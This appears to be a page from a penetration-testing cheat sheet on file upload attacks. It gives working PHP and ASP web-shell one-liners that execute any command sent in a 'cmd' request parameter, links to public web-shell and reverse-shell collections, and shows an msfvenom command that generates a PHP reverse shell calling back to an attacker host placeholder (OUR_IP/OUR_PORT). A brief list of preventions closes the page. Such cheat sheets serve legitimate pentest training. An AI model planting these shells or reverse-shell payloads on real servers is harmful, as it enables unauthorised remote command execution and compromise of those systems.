File Upload Attacks

cat << EOF > RCE.php
<?php system('hostname'); ?> 
EOF

Web Shells

LogoGitHub - Arrexel/phpbash: A semi-interactive PHP shell compressed into a single file.GitHub
LogoSecLists/Web-Shells at master · danielmiessler/SecListsGitHub

Custom Shell

<?php system($_REQUEST['cmd']); ?>
<% eval request('cmd') %

Reverse Shell

LogoGitHub - pentestmonkey/php-reverse-shellGitHub

Custom Reverse Shell

$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

-p is the payload

-f is the output language

Prevention

  • Extension Validation

  • Content Validation

  • restrict open_basedir

  • disable_functions in php.ini

PreviousLog PoisoningNextBypassing Extension

Last updated